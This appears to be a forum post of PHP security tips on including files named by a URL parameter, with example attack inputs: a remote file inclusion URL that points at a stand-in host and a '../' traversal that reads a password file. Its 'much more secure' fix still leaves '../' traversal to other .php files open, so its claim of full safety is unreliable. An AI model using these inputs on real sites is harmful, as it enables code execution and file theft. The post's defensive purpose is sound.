just a few security notes:
always (and I mean always always and not just sometimes always) hardcode a portion of the path to any include file that receives its pointer from the get array. Even more important now that php4.3+ supports remote file streaming. Imagine I accessed your page and typed blat.php?page=
http://mysite.hack/badbad.script - you would call that badbad.script and execute it on your server. Or ?page=../../hidden_files/pwd.txt - there are so many url hacks that you should be aware of.
Now - if you had require('include_files/' .$_GET['page']. '.php');
the script would look for 'include_files/http://...... which wouldn't exist -
Also an idea to set a default value if either $_GET['page'] is null, or the file doesn't exist.
Code: Select all
$_GET['page'] = (file_exists('include_files/' .$_GET['page'] .'.php')) ? 'include_files/' .$_GET['page'] .'.php' : 'include_files/default.php';
require_once($_GET['page']);
Much more secure
All that does is check whether a file exists in the include_files dir named $page.php - if it does it includes it - if it doesn't it includes default.php - so no matter what anyone types into the URL a page is always served and you know exactly what page too.